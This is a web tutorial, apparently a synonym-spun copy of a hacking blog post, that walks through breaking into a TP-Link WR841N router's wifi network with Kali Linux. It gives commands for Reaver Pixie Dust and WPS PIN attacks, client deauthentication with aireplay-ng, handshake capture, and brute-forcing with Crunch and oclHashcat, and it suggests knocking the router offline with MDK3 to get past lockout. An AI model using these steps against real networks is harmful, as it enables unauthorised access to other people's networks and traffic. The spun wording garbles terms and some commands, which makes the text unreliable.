How to hack a TP link WR841N router wireless network

start-e1434127811884.jpg


In this tutorial we will exhibit you how to hack a TP link WR841N router wi-fi community with the default wifi password working with Kali Linux. TP Website link routers use the default WPS PIN as wifi password out of the box Which consists of eight characters. We will attempt the following strategies to hack a TP link WR841N router wi-fi community:

one. Very first we attempt to get the password working with Reaver one.5.2 with Pixiedust WPS and the Aircrack-ng suite.
2. Than we attempt to get the WPS PIN working with Reaver.
three. The last process is capturing a 4-way handshake working with Airodump-ng, crank out a default password record with Crunch and bruteforce it with oclHashcat.

one. Pixie Dust WPS Assault with Reaver

Let us place the wifi interface in monitoring manner working with:
airmon-ng commence wlan0

For anyone obtaining the following error in Kali Linux 2. Sana:

[X] Mistake: Failed to open ‘wlan0mon’ for capturing

attempt this as a option:

one. Put the device in Monitor manner Airmon-ng commence wlan0
2. A monitoring interface will be commenced on wlan0mon
three. Use iwconfig to verify if the interface Method is in managed manner, if so then change it to keep track of rather of managed with the following instructions:
ifconfig wlan0mon down
iwconfig wlan0mon manner keep track of
ifconfig wlan0mon up
4. iwconfig verify if the manner is monitoring manner now
5. airodump-ng wlan0mon

If vital kill the processes Kali is complaining about:
Kali Linux Airmon-ng

Begin airodump-ng to get the BSSID, MAC address and channel of our focus on.

airodump-ng -i wlan0mon

Now select your focus on and use the BSSID and the channel for Reaver:

Reaver -i wlan0mon -b [BSSID] -vv -S -c [AP channel]

We will need the PKE, PKR, e-hash one&2, E/R-nonce and the authkey from Reaver to use for pixiewps.

Pixie Dust WPS Attack Reaver

Now commence pixiewps with the following arguments:

Pixie Dust WPS Attack Reaver2

Components:
E-Hash1 is a hash in which we brute drive the very first 50 % of the PIN.
E-Hash2 is a hash in which we brute drive the 2nd 50 % of the PIN.
HMAC is a operate that hashes all the information in parenthesis. The operate is HMAC-SHA-256.
PSK1 is the very first 50 % of the router’s PIN (ten,000 possibilities)
PSK2 is the 2nd 50 % of the router’s PIN (one,000 or ten,000 possibilities depending if we want to compute the checksum. We just do ten,000 mainly because it tends to make no time variance and it’s just simpler.)
PKE is the Community Important of the Enrollee (applied to validate the legitimacy of a WPS exchange and prevent replays.)
PKR is the Community Important of the Registrar (applied to validate the legitimacy of a WPS exchange and prevent replays.)

This router is not vulnerable to Pixie Dust WPS Assault.

2. Reaver WPS PIN Assault

Let us attempt to hack this router working with Reaver. Begin Reaver with 5 seconds hold off and imitating a win7 Personal computer:

reaver -i wlan0mon -b [BSSID] -vv -c one -d 5 -w

However the routers AP level limiting kicks in and locks itself following 6 tries and has to be unlocked manually. As an substitute you can attempt to DOS the router with MDK3 to drive a reboot which also unlocks the router.

Reaver Attack

three. Brute forcing the router with oclHashcat

Let us see if we can get the password by capturing a 4-way handshake and an offline bruteforce attack with a default router password record. We will be working with the following applications:

one. Crunch to crank out the password record.
2. Airodump-ng to seize the 4-way handshake.
three. airplay-ng to drive de-auth linked clientele.
4. oclHashcat GPU on Home windows.

Let us commence Crunch with the following command:
crunch eight eight 1234567890 -o /root/Desktop/88numlist.txt

This may possibly acquire a minor though, the final result is a 900 MB wordlist containing all attainable combinations of eight digits. This wordlist will hack a TP link WR841N router wi-fi community with one hundred% certainty.

Let us seize the handshake with Airodump-ng and Aireplay-ng and commence Airodump-ng to uncover our focus on with the following command:
airodump-ng wlan0mon

Now select your target’s BSSID and channel and restart Airodump-ng with the following command and appear for a linked consumer:

airodump-ng –bssid [BSSID] -c [channel]-w [filepath to store .cap]wlan0mon

Now de-auth the linked consumer working with Aireplay-ng in a new terminal.

aireplay-ng – 2 -a [BSSID] -c [Client MAC] wlan0mon

De-auth succesful and the 4 way handshake is captured!
Aircrack-ng aireplay-ng

Step three: Bruteforce with default router password record
We’ll use oclHashcat GPU on Home windows to crack the WiFi password working with the passwordlist we developed before.

We have to transform the .cap file to a .hccap very first working with the following command:

aircrack-ng -J [Filepath to save .hccap file] [Filepath to .cap file]

[embedyt]http://www.youtube.com/view?v=WFncxKlmw2A&width=five hundred&height=350[/embedyt]

Begin oclHashcat on Home windows working with the following command:

oclhashcat64.exe -m 2500 -w three –[gpu-temp-retain=sixty] –status -o cracked.txt tplink.hccap 88numlist.txt

Notice: –gpu-temp-retain is AMD only.

Hold out a minor though for this final result:
oclhashcat

This is how to hack a TP link WR841N router wi-fi community with one hundred% certainty.

In the up coming video we will use this router to show a MiTM attack and the Evil Twin Wi-fi AP.

Thanks for looking at and you should subscribe to my YouTube channel for extra hacking tutorials 🙂

If you want to examine extra about hacking TP Website link routers have a appear at this new tutorial:

TP Link Archer C5 Router Hacking banner

If you are intrigued in learning extra about WiFi hacking and wi-fi in normal, you can adhere to any of these on the internet courses:



On line Hacking Courses


Master Wi-fi Hacking/Penetration Testing From Scratch

This system incorporates fifty Movies to discover sensible assaults to take a look at the safety of Wi-fi and wired networks from scratch working with Linux. Examine more…

ARP spoofing & Guy In The Center Assaults Execution & Detection

Master sensible assaults to take a look at the safety of clientele linked to a community and how to safeguard in opposition to these assaults. Examine more…



Resource link